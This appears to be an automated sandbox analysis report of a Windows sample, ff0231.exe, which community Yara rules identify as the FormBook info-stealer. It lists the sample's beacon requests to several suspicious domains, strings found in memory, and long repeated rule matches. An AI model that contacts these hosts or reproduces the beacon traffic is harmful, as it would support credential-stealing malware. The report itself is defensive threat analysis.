Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Thu, 25 Nov 2021 13:54:13 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Source: rundll32.exe, 00000009.00000002.1196803684.00000000059FF000.00000004.00020000.sdmp	String found in binary or memory: http://cirn.one
Source: explorer.exe, 00000010.00000003.865574906.00000000062B2000.00000004.00000001.sdmp, explorer.exe, 00000010.00000003.837006257.00000000062B2000.00000004.00000001.sdmp, explorer.exe, 00000010.00000003.835362467.00000000062B2000.00000004.00000001.sdmp, explorer.exe, 00000010.00000003.835158670.00000000062B2000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.880662888.00000000062B2000.00000004.00000001.sdmp, explorer.exe, 00000010.00000003.834998089.00000000062B2000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.836821710.00000000062B2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ff0231.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: ff0231.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown

DNS traffic detected: queries for: www.comptesgratuit.fr

Source: global traffic	HTTP traffic detected: GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=ygpAwtep7WxWCgU1n5iY5amVcELu0tSIdE/9Y9Jyy4nkdNu97XXXbghTbpjnrxNYSyQT HTTP/1.1Host: www.comptesgratuit.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?z0GdXd=TEDmW6iEX7An5lAq1gB0cQiS4L3buUHqtO3o3qqMncoo4GVsMboScKfxnSemig/wshnV&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1Host: www.evchargeoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=tXPHdmDKONGhRVqCA0IZHOyO0PTL+BRkpbdAk/iYV8rKicqHrA4rokXZ0wK7+ll/WvZA HTTP/1.1Host: www.meta-facebook.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?z0GdXd=N2vEI1OX7w/3udy+ydCYc971PZER2FJlK1gZL6lMnGSu15qwd848spLio4s8j+VNLmhX&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1Host: www.schuette.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=n2wKPxZ8pCyDi97rnXro6S5Jba3+KYmZJcqoataOVa/Ib+/xmeU19xREWNmNK15lIZxN HTTP/1.1Host: www.teslaislandboys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?z0GdXd=WoHcE9GCxXT7wUBgkc+2l4Z3+m1n5nn1xCnIHBmko3viCo3Igm4+Oh54SxcB0NGJBR7p&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1Host: www.facebook-meta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: ff0231.exe, 00000000.00000002.677059858.00000000006FA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: ff0231.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
